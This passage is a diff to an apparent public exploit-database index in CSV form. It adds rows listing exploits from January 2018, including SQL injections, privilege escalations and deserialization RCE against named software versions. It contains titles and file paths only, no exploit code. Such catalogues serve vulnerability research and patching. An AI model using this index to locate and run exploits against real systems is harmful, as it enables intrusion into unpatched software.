 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware, 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows, 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows, @@ -9302,6 +9303,7 @@ id,file,description,date,author,type,platform,port 43775,exploits/linux/local/43775.c,"glibc - 'getcwd()' Local Privilege Escalation",2018-01-16,halfdog,local,linux, 43925,exploits/macos/local/43925.rb,"Arq 5.10 - Local Privilege Escalation (1)",2018-01-29,"Mark Wadham",local,macos, 43926,exploits/macos/local/43926.sh,"Arq 5.10 - Local Privilege Escalation (2)",2018-01-29,"Mark Wadham",local,macos, +43929,exploits/windows/local/43929.c,"System Shield 5.0.0.136 - Privilege Escalation",2018-01-30,"Parvez Anwar",local,windows, 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android, 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple, 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows, @@ -15973,6 +15975,7 @@ id,file,description,date,author,type,platform,port 43902,exploits/multiple/remote/43902.py,"BMC BladeLogic 8.3.00.64 - Remote Command Execution",2018-01-26,"Paul Taylor",remote,multiple, 43920,exploits/linux/remote/43920.py,"Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution",2018-01-28,mr_me,remote,linux, 43924,exploits/multiple/remote/43924.rb,"Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)",2018-01-29,Metasploit,remote,multiple, +43927,exploits/windows/remote/43927.txt,"HPE iMC 7.3 - RMI Java Deserialization",2018-01-30,"Chris Lyne",remote,windows, 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows, 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows, 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22 @@ -37943,6 +37946,11 @@ id,file,description,date,author,type,platform,port 43918,exploits/php/webapps/43918.txt,"Buddy Zone 2.9.9 - SQL Injection",2018-01-28,"Ihsan Sencan",webapps,php, 43919,exploits/hardware/webapps/43919.html,"Netis WF2419 Router - Cross-Site Request Forgery",2018-01-28,"Sajibe Kanti",webapps,hardware, 43922,exploits/nodejs/webapps/43922.html,"KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery",2018-01-28,"Saurabh Banawar",webapps,nodejs, +43928,exploits/windows/webapps/43928.py,"Advantech WebAccess < 8.3 - SQL Injection",2018-01-30,"Chris Lyne",webapps,windows, +43931,exploits/php/webapps/43931.txt,"Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal",2018-01-30,"Ihsan Sencan",webapps,php, +43932,exploits/php/webapps/43932.txt,"Joomla! Component CP Event Calendar 3.0.1 - 'id' SQL Injection",2018-01-30,"Ihsan Sencan",webapps,php, +43933,exploits/php/webapps/43933.txt,"Joomla! Component Visual Calendar 3.1.3 - 'id' SQL Injection",2018-01-30,"Ihsan Sencan",webapps,php, +43934,exploits/windows/webapps/43934.py,"BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure",2018-01-30,"Paul Taylor",webapps,windows,4750 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80